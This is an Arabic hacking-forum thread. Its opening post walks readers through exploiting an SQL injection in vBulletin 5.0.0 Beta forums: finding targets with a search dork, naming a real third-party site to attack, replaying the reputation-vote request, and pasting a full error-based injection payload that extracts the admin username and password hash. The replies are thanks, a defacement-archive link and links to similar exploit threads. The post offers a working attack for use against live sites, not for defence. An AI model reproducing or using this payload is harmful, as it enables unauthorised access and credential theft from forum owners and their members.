شرح ثغرة sql في منتديات Vbulletin 5 x x

شرح ثغرة sql في منتديات Vbulletin 5 x x


النتائج 1 إلى 10 من 10

الموضوع: شرح ثغرة sql في منتديات Vbulletin 5 x x

  1. #1

    افتراضي شرح ثغرة sql في منتديات Vbulletin 5 x x

    اليوم ساشرح تغرة في منتديات الفي بولتن 5


    الشرح لvirusx-76 (اندلوسي) Morocco وارجو من كل من ينقل الموضوع ان ينقله مع الحقوق

    نوع التغرة : SQL Injection

    Powered by vBulletin™ Version 5.0.0 Beta : Dork

    نبدا اول شئ نبحت بواسطة الدورك في العم خوخل الى ان تجد منتدجى مركب النسخة

    انا ساجرب على هدا المنتدى http://www.trchobby.com

    اوك اول خطوة قم بالتسجيل في المنتدى كعضو

    بعدج دلك ندخل المنتدى ونبحت عن مواضيع الاعضاء

    اي موضوع لاكني افضل انك تجيب موضوع للادمن كي تاخد الكاس مرة واحدة

    ملاحظة كي تعرف الادمن بسرعة اضغط على اسم اي عضوفي المنتدى او اسم عضويتك

    وسيكون الرابط على هدا الشكل http://www.trchobby.com/member/2-xxxx

    مكان 2-xxx استبدلها بالرقم 1 وياتيك اسم الادمن

    اوك نرحع للتغرة بعد ما جبت مشاركة او موضوع للادجمن ندهب في متصفح الموزيلا الى tools=) HTTP HEaders

    ان لم نحدها حملها هنا https://addons.mozilla.org/en/firefo...e-http-headers

    بعد الضعط على HTTP HEaders ادهب للصفحة اللي كاتب فيها الادمن واعطيه لايك

    سيضهر لك كودات اختار السطر الدي يشبه هدا /ajax/api/reputation/vote HTTP/1.1

    بعد دلك اضغط كلمة Replay في الاسفل

    ستضهر لكنافدة جديدة مكتواب فيها noteid=somenumber لا تمسحها ستقوم بنسخ سطر استغلال التغرة

    حنبها مباشرة

    سطر استغلال التغرة وهو

    ) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338


    بعد دلك اضغط Replay ومبروك عليك سيعرض المعلومات على المتصفح او يعطيك ملف تحمله تجد بداخله البيانات

    هدا رابط لتحميل الفديو + معلومات التغرة

    http://download1401.mediafire.com/bg...tin+Latest.rar
    خودها كاملة ولا بالناقص

  2. #2

    افتراضي رد: شرح ثغرة sql في منتديات Vbulletin 5 x x

    بارك الله فيك ..ينقل للقسم المناسب

    لا اله الا الله محمد رسول الله




  3. #3

    افتراضي رد: شرح ثغرة sql في منتديات Vbulletin 5 x x

    الله يجزيك الخير موضوع روعة

  4. #4

    افتراضي رد: شرح ثغرة sql في منتديات Vbulletin 5 x x

    جعل حسناتكم في الميزان المقبول

  5. #5

    افتراضي رد: شرح ثغرة sql في منتديات Vbulletin 5 x x

    اسف لم اعرف انه القسم الغير مناسب ومشكورين يا اخوة على الردود
    خودها كاملة ولا بالناقص

  6. #6

    افتراضي رد: شرح ثغرة sql في منتديات Vbulletin 5 x x

    مشكور
    يعطيك العافية

    المَوُاْضِيِعّ الّتَيِ لاَ تَسْتَحّقْ رَدْاً لَنّ أّرْدّ عَلِيِهَاْ

    zone-h me

    http://zone-h.org/archive/notifier=Mr GaLeed

  7. #7

    افتراضي رد: شرح ثغرة sql في منتديات Vbulletin 5 x x

    جزاك الله ألف خير

  8. #8

    افتراضي رد: شرح ثغرة sql في منتديات Vbulletin 5 x x

    بارك الله فيك

  9. #9

    افتراضي رد: شرح ثغرة sql في منتديات Vbulletin 5 x x

    بارك الله فيك...............

  10. #10

    افتراضي رد: شرح ثغرة sql في منتديات Vbulletin 5 x x

    بارك الله فيك




    ๑۩۞۩๑ أَشْهَدُ أَنْ لاَ إِلَهَ إِلاَّ اللَّهُ.أَشْهَدُ أَنَّ مُحَمَّدًا رَسُولُ اللَّهِ๑۩۞۩๑
    My Skype :amino.mamino2
    www.facebook.com/groups/352168554914060


المواضيع المتشابهه

  1. ثغرة جديده في منتديات 3.8.2 .. vBulletin 3.8.2 adminCP Cross-Site Scrip
    بواسطة ahmedfreed في المنتدى قسم الثغرات
    مشاركات: 12
    آخر مشاركة: 04-17-2013, 10:19 PM
  2. ثغرة في منتديات الفي بي vBulletin 4.0.x
    بواسطة millen!um في المنتدى قسم الثغرات
    مشاركات: 25
    آخر مشاركة: 07-12-2012, 11:22 PM
  3. ثغرة XSS في منتديات vBulletin 3.8.4
    بواسطة hacks في المنتدى قسم الثغرات
    مشاركات: 5
    آخر مشاركة: 07-06-2012, 06:29 AM
  4. مشكله بي ثغره vb3.8.6، ثغرة vb 3.8.6 ثغرة في بي 3.8.6 ثغرة 3.8.6 ثغرة vbulletin 3.8.6
    بواسطة هكر لايرحم في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 3
    آخر مشاركة: 02-26-2012, 02:44 AM
  5. شرح تشفير شيل xml لرفعه في منتديات vBulletin..
    بواسطة Ace في المنتدى اختراق المواقع والسيرفرات
    مشاركات: 5
    آخر مشاركة: 10-08-2011, 05:03 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •